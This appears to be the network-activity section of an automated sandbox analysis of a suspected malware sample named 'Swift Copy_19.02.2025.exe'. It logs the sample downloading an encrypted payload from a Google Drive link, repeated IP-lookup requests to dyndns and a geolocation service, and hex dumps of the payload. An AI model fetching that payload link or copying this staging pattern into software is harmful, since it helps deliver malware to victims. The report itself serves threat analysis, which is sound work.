                                                                              Feb 21, 2025 08:22:32.799252033 CET44349978104.21.64.1192.168.2.7
                                                                              Feb 21, 2025 08:22:32.799335957 CET49978443192.168.2.7104.21.64.1
                                                                              Feb 21, 2025 08:22:32.799602032 CET49978443192.168.2.7104.21.64.1
                                                                              Feb 21, 2025 08:22:32.799627066 CET44349978104.21.64.1192.168.2.7
                                                                              Feb 21, 2025 08:22:32.840208054 CET4997780192.168.2.7132.226.247.73
                                                                              Feb 21, 2025 08:22:33.278975964 CET44349978104.21.64.1192.168.2.7
                                                                              Feb 21, 2025 08:22:33.280951977 CET49978443192.168.2.7104.21.64.1
                                                                              Feb 21, 2025 08:22:33.281008005 CET44349978104.21.64.1192.168.2.7
                                                                              Feb 21, 2025 08:22:33.424256086 CET44349978104.21.64.1192.168.2.7
                                                                              Feb 21, 2025 08:22:33.424324989 CET44349978104.21.64.1192.168.2.7
                                                                              Feb 21, 2025 08:22:33.424474955 CET49978443192.168.2.7104.21.64.1
                                                                              Feb 21, 2025 08:22:33.425183058 CET49978443192.168.2.7104.21.64.1
                                                                              Feb 21, 2025 08:22:33.451481104 CET4997780192.168.2.7132.226.247.73
                                                                              Feb 21, 2025 08:22:33.452764988 CET4997980192.168.2.7132.226.247.73
                                                                              Feb 21, 2025 08:22:33.456820011 CET8049977132.226.247.73192.168.2.7
                                                                              Feb 21, 2025 08:22:33.456893921 CET4997780192.168.2.7132.226.247.73
                                                                              Feb 21, 2025 08:22:33.457768917 CET8049979132.226.247.73192.168.2.7
                                                                              Feb 21, 2025 08:22:33.457854033 CET4997980192.168.2.7132.226.247.73
                                                                              Feb 21, 2025 08:22:33.457906008 CET4997980192.168.2.7132.226.247.73
                                                                              Feb 21, 2025 08:22:33.462876081 CET8049979132.226.247.73192.168.2.7
                                                                              Feb 21, 2025 08:22:34.121898890 CET8049979132.226.247.73192.168.2.7
                                                                              Feb 21, 2025 08:22:34.123156071 CET49980443192.168.2.7104.21.64.1
                                                                              Feb 21, 2025 08:22:34.123208046 CET44349980104.21.64.1192.168.2.7
                                                                              Feb 21, 2025 08:22:34.123333931 CET49980443192.168.2.7104.21.64.1
                                                                              Feb 21, 2025 08:22:34.123533964 CET49980443192.168.2.7104.21.64.1
                                                                              Feb 21, 2025 08:22:34.123550892 CET44349980104.21.64.1192.168.2.7
                                                                              Feb 21, 2025 08:22:34.168284893 CET4997980192.168.2.7132.226.247.73
                                                                              Feb 21, 2025 08:22:34.590830088 CET44349980104.21.64.1192.168.2.7
                                                                              Feb 21, 2025 08:22:34.637048960 CET49980443192.168.2.7104.21.64.1
                                                                              Feb 21, 2025 08:22:37.031905890 CET49980443192.168.2.7104.21.64.1
                                                                              Feb 21, 2025 08:22:37.031936884 CET44349980104.21.64.1192.168.2.7
                                                                              Feb 21, 2025 08:22:37.142427921 CET44349980104.21.64.1192.168.2.7
                                                                              Feb 21, 2025 08:22:37.142518997 CET44349980104.21.64.1192.168.2.7
                                                                              Feb 21, 2025 08:22:37.142626047 CET49980443192.168.2.7104.21.64.1
                                                                              Feb 21, 2025 08:22:37.143208027 CET49980443192.168.2.7104.21.64.1
                                                                              Feb 21, 2025 08:22:37.146390915 CET4998180192.168.2.7132.226.247.73
                                                                              Feb 21, 2025 08:22:37.151413918 CET8049981132.226.247.73192.168.2.7
                                                                              Feb 21, 2025 08:22:37.151520014 CET4998180192.168.2.7132.226.247.73
                                                                              Feb 21, 2025 08:22:37.151688099 CET4998180192.168.2.7132.226.247.73
                                                                              Feb 21, 2025 08:22:37.156739950 CET8049981132.226.247.73192.168.2.7
                                                                              Feb 21, 2025 08:22:37.814584970 CET8049981132.226.247.73192.168.2.7
                                                                              Feb 21, 2025 08:22:37.855823040 CET4998180192.168.2.7132.226.247.73
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Feb 21, 2025 08:22:22.496881962 CET5603853192.168.2.71.1.1.1
                                                                              Feb 21, 2025 08:22:22.505244970 CET53560381.1.1.1192.168.2.7
                                                                              Feb 21, 2025 08:22:24.042017937 CET5299653192.168.2.71.1.1.1
                                                                              Feb 21, 2025 08:22:24.051177979 CET53529961.1.1.1192.168.2.7
                                                                              Feb 21, 2025 08:22:28.658999920 CET6396653192.168.2.71.1.1.1
                                                                              Feb 21, 2025 08:22:28.666435957 CET53639661.1.1.1192.168.2.7
                                                                              Feb 21, 2025 08:22:29.953207970 CET6078653192.168.2.71.1.1.1
                                                                              Feb 21, 2025 08:22:29.963320971 CET53607861.1.1.1192.168.2.7
                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Feb 21, 2025 08:22:22.496881962 CET192.168.2.71.1.1.10xa37eStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                              Feb 21, 2025 08:22:24.042017937 CET192.168.2.71.1.1.10xf691Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                              Feb 21, 2025 08:22:28.658999920 CET192.168.2.71.1.1.10x1028Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                              Feb 21, 2025 08:22:29.953207970 CET192.168.2.71.1.1.10x4c28Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Feb 21, 2025 08:22:22.505244970 CET1.1.1.1192.168.2.70xa37eNo error (0)drive.google.com172.217.16.206A (IP address)IN (0x0001)false
                                                                              Feb 21, 2025 08:22:24.051177979 CET1.1.1.1192.168.2.70xf691No error (0)drive.usercontent.google.com142.250.185.193A (IP address)IN (0x0001)false
                                                                              Feb 21, 2025 08:22:28.666435957 CET1.1.1.1192.168.2.70x1028No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                              Feb 21, 2025 08:22:28.666435957 CET1.1.1.1192.168.2.70x1028No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                              Feb 21, 2025 08:22:28.666435957 CET1.1.1.1192.168.2.70x1028No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                              Feb 21, 2025 08:22:28.666435957 CET1.1.1.1192.168.2.70x1028No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                              Feb 21, 2025 08:22:28.666435957 CET1.1.1.1192.168.2.70x1028No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                              Feb 21, 2025 08:22:28.666435957 CET1.1.1.1192.168.2.70x1028No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                              Feb 21, 2025 08:22:29.963320971 CET1.1.1.1192.168.2.70x4c28No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                              Feb 21, 2025 08:22:29.963320971 CET1.1.1.1192.168.2.70x4c28No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                              Feb 21, 2025 08:22:29.963320971 CET1.1.1.1192.168.2.70x4c28No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                              Feb 21, 2025 08:22:29.963320971 CET1.1.1.1192.168.2.70x4c28No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                              Feb 21, 2025 08:22:29.963320971 CET1.1.1.1192.168.2.70x4c28No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                              Feb 21, 2025 08:22:29.963320971 CET1.1.1.1192.168.2.70x4c28No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                              Feb 21, 2025 08:22:29.963320971 CET1.1.1.1192.168.2.70x4c28No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                              • drive.google.com
                                                                              • drive.usercontent.google.com
                                                                              • reallyfreegeoip.org
                                                                              • checkip.dyndns.org
                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.749974132.226.247.7380720C:\Users\user\Desktop\Swift Copy_19.02.2025.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Feb 21, 2025 08:22:28.683619976 CET151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Feb 21, 2025 08:22:29.357745886 CET273INHTTP/1.1 200 OK
                                                                              Date: Fri, 21 Feb 2025 07:22:29 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 104
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                              Feb 21, 2025 08:22:29.380371094 CET127OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Feb 21, 2025 08:22:29.587616920 CET273INHTTP/1.1 200 OK
                                                                              Date: Fri, 21 Feb 2025 07:22:29 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 104
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                              Feb 21, 2025 08:22:30.601624966 CET127OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Feb 21, 2025 08:22:30.807456970 CET273INHTTP/1.1 200 OK
                                                                              Date: Fri, 21 Feb 2025 07:22:30 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 104
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.749977132.226.247.7380720C:\Users\user\Desktop\Swift Copy_19.02.2025.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Feb 21, 2025 08:22:32.127432108 CET127OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Feb 21, 2025 08:22:32.797480106 CET273INHTTP/1.1 200 OK
                                                                              Date: Fri, 21 Feb 2025 07:22:32 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 104
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.749979132.226.247.7380720C:\Users\user\Desktop\Swift Copy_19.02.2025.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Feb 21, 2025 08:22:33.457906008 CET127OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Feb 21, 2025 08:22:34.121898890 CET273INHTTP/1.1 200 OK
                                                                              Date: Fri, 21 Feb 2025 07:22:34 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 104
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              3192.168.2.749981132.226.247.7380
                                                                              TimestampBytes transferredDirectionData
                                                                              Feb 21, 2025 08:22:37.151688099 CET151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Feb 21, 2025 08:22:37.814584970 CET273INHTTP/1.1 200 OK
                                                                              Date: Fri, 21 Feb 2025 07:22:37 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 104
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.749972172.217.16.206443720C:\Users\user\Desktop\Swift Copy_19.02.2025.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-02-21 07:22:23 UTC216OUTGET /uc?export=download&id=18Kyx2LntnZpiKsTwYTgdWT8PutIhm-KW HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                              Host: drive.google.com
                                                                              Cache-Control: no-cache
                                                                              2025-02-21 07:22:24 UTC1610INHTTP/1.1 303 See Other
                                                                              Content-Type: application/binary
                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                              Pragma: no-cache
                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                              Date: Fri, 21 Feb 2025 07:22:23 GMT
                                                                              Location: https://drive.usercontent.google.com/download?id=18Kyx2LntnZpiKsTwYTgdWT8PutIhm-KW&export=download
                                                                              Strict-Transport-Security: max-age=31536000
                                                                              Content-Security-Policy: script-src 'nonce-G3tArnej3MThHKkophCEtQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                              Server: ESF
                                                                              Content-Length: 0
                                                                              X-XSS-Protection: 0
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              X-Content-Type-Options: nosniff
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.749973142.250.185.193443720C:\Users\user\Desktop\Swift Copy_19.02.2025.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-02-21 07:22:24 UTC258OUTGET /download?id=18Kyx2LntnZpiKsTwYTgdWT8PutIhm-KW&export=download HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                              Cache-Control: no-cache
                                                                              Host: drive.usercontent.google.com
                                                                              Connection: Keep-Alive
                                                                              2025-02-21 07:22:27 UTC5015INHTTP/1.1 200 OK
                                                                              X-GUploader-UploadID: AHMx-iHgJH4jJQuXVz_LRxDqZ2i54icU9ytyooDm9sDpSPpf8LvGFBS5pqTiPLlbutz-QjRGt8CfGuY
                                                                              Content-Type: application/octet-stream
                                                                              Content-Security-Policy: sandbox
                                                                              Content-Security-Policy: default-src 'none'
                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                              X-Content-Security-Policy: sandbox
                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                              Cross-Origin-Embedder-Policy: require-corp
                                                                              Cross-Origin-Resource-Policy: same-site
                                                                              X-Content-Type-Options: nosniff
                                                                              Content-Disposition: attachment; filename="nMDUz119.bin"
                                                                              Access-Control-Allow-Origin: *
                                                                              Access-Control-Allow-Credentials: false
                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 278080
                                                                              Last-Modified: Wed, 19 Feb 2025 10:57:09 GMT
                                                                              Date: Fri, 21 Feb 2025 07:22:26 GMT
                                                                              Expires: Fri, 21 Feb 2025 07:22:26 GMT
                                                                              Cache-Control: private, max-age=0
                                                                              X-Goog-Hash: crc32c=9R8Imw==
                                                                              Server: UploadServer
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close
                                                                              2025-02-21 07:22:27 UTC5015INData Raw: 1d b0 79 35 df fc 27 19 1a 1e 8d 5a 15 14 b1 0b e4 52 70 7a 6b ab 4f 4f a3 2b ee c7 56 16 cf 20 51 ca 23 23 5a fc 52 de 7a e5 40 c8 d2 34 b5 d1 81 eb db 74 c3 a8 fe 7e 90 1e e1 58 88 ff 9e 8a 72 89 70 86 e5 f4 c4 8a bc db 0f 1e a6 7c 79 00 7a 2f be da b9 b3 24 ce 25 a4 bd 04 a5 78 35 1d 66 31 d7 26 bf 0e 3a 70 04 a8 4f 78 af 5c 95 77 55 6d b2 17 51 3d 7d d2 ee 51 d3 b8 10 9b 7f 65 bc 41 a9 e1 76 2d 54 c3 41 2f 85 1c a4 8c 0b 26 f5 f8 e1 0f 7e d2 4e e8 fd 29 1c 07 c5 d2 91 31 2f a1 c4 86 b0 b0 5e 5e 4a b2 63 f3 24 c0 0c 9d 6b 6d 76 9f c9 fc 34 eb 57 f1 c9 a1 9b 46 cb 11 5e 88 15 0a 6b fb 28 f3 05 61 db d4 2c ce a3 c3 df 7c 6b 80 19 a8 09 3c 0f d1 7b a9 8c c6 0f 30 3c 5e 43 b0 8d f8 73 41 6d 9c 4b b0 3b e2 ca d3 d2 50 af 56 00 20 f2 88 b8 cc b5 9a 67 73 09
                                                                              Data Ascii: y5'ZRpzkOO+V Q##ZRz@4t~Xrp|yz/$%x5f1&:pOx\wUmQ=}QeAv-TA/&~N)1/^^Jc$kmv4WF^k(a,|k<{0<^CsAmK;PV gs
                                                                              2025-02-21 07:22:27 UTC4666INData Raw: 1e c3 bf 1a 57 e3 d7 e5 37 05 84 b3 14 87 a3 63 22 0d 8b 70 0f 1f bb f4 7d 19 cf 9c c0 95 b9 66 09 68 a5 48 48 3c 07 53 09 85 b7 c8 2c 5c 38 48 6b 41 2a 1b c9 e2 17 bd bd aa 9c dd a0 de 3e 2b f5 7c f3 f3 2f 58 9a 49 cd c0 26 f3 da 4a 07 6e cd 2f 4f 10 27 b6 3a bb 1c 2a 4c b9 ab d1 0f 08 a5 1e fe b2 6e 16 a5 40 8e af 6f 9d e9 8e 18 04 31 91 52 b4 39 ac 69 92 af 3b ba fe f3 f6 3c 42 30 3a 6b f6 a3 42 50 80 82 db d4 af fc c3 9c 84 44 d9 56 85 e9 9b 33 a2 e3 40 15 48 49 3c 72 82 4f 7e 9a d0 46 89 29 80 fb 76 cc 53 c4 b8 b1 93 3c fe ed 36 32 0c fe ee 66 a2 58 55 bb 9a 99 0c 65 0f a7 11 09 2c ca 7d 5e 2e f7 e6 66 26 d9 77 b2 36 f4 37 56 72 c2 9b cf 7d 90 b9 0b 77 f5 2a 98 08 67 88 61 36 44 89 63 51 6d dd 10 3b bc 0f 89 a9 2a e6 b7 da e0 d2 26 9a 8a 6d 26 c0 3f
                                                                              Data Ascii: W7c"p}fhHH<S,\8HkA*>+|/XI&Jn/O':*Ln@o1R9i;<B0:kBPDV3@HI<rO~F)vS<62fXUe,}^.f&w67Vr}w*ga6DcQm;*&m&?
                                                                              2025-02-21 07:22:27 UTC1325INData Raw: 80 5f 5e 61 ad 5d 86 c6 3f 4e be 90 c9 27 54 7a 7e 83 13 65 90 dd ca 8c f0 8c f0 71 84 fd 96 8f ee 03 7f 37 d2 78 e8 3e e7 43 35 32 93 e5 e2 9f b4 a7 2e f1 3e 34 70 eb 90 d2 b8 83 5a b7 cd f8 b2 23 2c 2e d2 b9 4c 96 b5 13 0f 01 38 72 e8 cd ad 42 55 a8 2e b4 b6 9d a9 8a 7a 58 32 e3 15 17 96 ab d0 a7 54 09 69 71 0e 0b 34 0a 17 90 54 6c a5 34 29 4e 8d 3a 62 ce 73 82 e1 49 d1 5a 8d fb 02 36 da 9d e7 fb db 41 e0 fc b5 3d b5 33 17 b4 a1 7f 9c 68 06 80 52 b0 19 74 db de 66 d1 dd 60 91 75 aa 7a 74 06 12 8b ef 4d a9 57 4c 8b f9 2d 04 3f c0 2f 95 65 9b 34 98 e6 bb a8 6c 52 bf aa 44 27 c6 cb f1 21 05 93 55 70 17 fd af ec a6 41 a4 76 37 2d 50 36 72 5f 87 be ad 88 db 8b 02 59 9f 4c 9f e9 e6 48 25 0f 9f 26 48 49 ac f0 0e 2b aa d6 1a dc b9 2e 32 54 81 14 ec 09 5b 84 e2
                                                                              Data Ascii: _^a]?N'Tz~eq7x>C52.>4pZ#,.L8rBU.zX2Tiq4Tl4)N:bsIZ6A=3hRtf`uztMWL-?/e4lRD'!UpAv7-P6r_YLH%&HI+.2T[
                                                                              2025-02-21 07:22:27 UTC1390INData Raw: 32 44 32 8f 63 69 4e eb 79 d1 7c 71 0f 5a 36 5e 95 53 47 6f ff a6 55 2d 96 86 e5 02 3a ea d6 e9 df 08 cd 6c 67 4e 98 68 4d 5a c4 15 4a ff 9a 2a 07 64 7d 0e b5 70 4a 5f fd dd 70 f7 1e dd eb d6 ed b1 18 ff 16 ba 6d 56 aa ab cb 63 67 b6 a8 3a 55 ef 4f 76 14 9e 3e 0d 75 be f9 67 83 89 f7 97 2b 09 ae a4 48 31 bb d1 29 31 95 0d 18 14 60 14 d4 fc 2e ff 29 84 4e 6e 70 2b 15 5f 9f 23 5c 01 e7 17 95 5d 14 0b ea 1f 6a bc 17 c2 46 eb c0 5b 58 b5 00 94 fb bc 26 8f 9d d1 7a 4d 37 3c ed 1c bc 02 92 1f 4f 71 1c 2f cc 4b 5a 45 37 4b 11 62 6c 49 e1 b5 41 28 60 f4 01 bd 0c 55 57 f9 17 e2 1f 8c d1 9e 87 ae 2c 5f 27 37 46 f7 ba e5 a7 5e 57 25 27 82 cc e9 4b df 77 3f 10 79 db dc e8 b3 20 35 72 0f c6 12 58 6c 7a 1c fe 19 e4 6f 8e 4b 13 2d d4 7f 40 50 bc 47 5e c6 96 f6 ad 67 53
                                                                              Data Ascii: 2D2ciNy|qZ6^SGoU-:lgNhMZJ*d}pJ_pmVcg:UOv>ug+H1)1`.)Nnp+_#\]jF[X&zM7<Oq/KZE7KblIA(`UW,_'7F^W%'Kw?y 5rXlzoK-@PG^gS
                                                                              2025-02-21 07:22:27 UTC1390INData Raw: 19 67 71 03 9d 1f e6 94 8c 68 fd e3 ee 35 cc 97 c7 43 fe 7d f7 76 95 b8 5e 77 69 19 79 f1 d1 8c 17 0e b9 05 3d 95 f5 99 c1 27 bc 7c 39 52 54 a1 d3 3e 3b 52 c0 ad 1c d3 1b ec dd 79 be 2b ae 11 07 4e 7d 1e a9 9d e2 bf 90 39 36 c2 87 ec 02 6e ed 7e 08 9b 6a 3e 02 1f 1c 9b 09 01 94 f9 4f 7b 46 27 40 a8 a6 8e 98 2a 4e 3d 32 d6 54 f0 10 9b a5 fd 09 b0 aa 96 db 83 62 c3 db 4c 9a b5 78 9a f9 67 d2 9d ae c5 93 29 38 1e cd 5f bd 01 91 e5 40 4b cb 21 45 52 dc 3e 3d 81 b2 bd 5a 02 48 18 91 54 38 a6 65 7b 9b ea 4a 9c b2 43 03 2c c3 82 af 92 21 2f fa 0c 28 a9 5a 97 2f 54 12 96 fe 05 db ef 26 03 8a 12 70 d2 43 45 0e d3 fa 71 0b 7c cb 4d 48 b9 34 72 aa c4 27 cf 88 d7 84 d7 b9 a2 7c 0c 3b b6 d2 3b 60 51 78 02 fd 7b 74 df 1c 39 c0 1c 15 53 05 97 fc 9e 6a 1e 5f 32 51 a0 45
                                                                              Data Ascii: gqh5C}v^wiy='|9RT>;Ry+N}96n~j>O{F'@*N=2TbLxg)8_@K!ER>=ZHT8e{JC,!/(Z/T&pCEq|MH4r'|;;`Qx{t9Sj_2QE
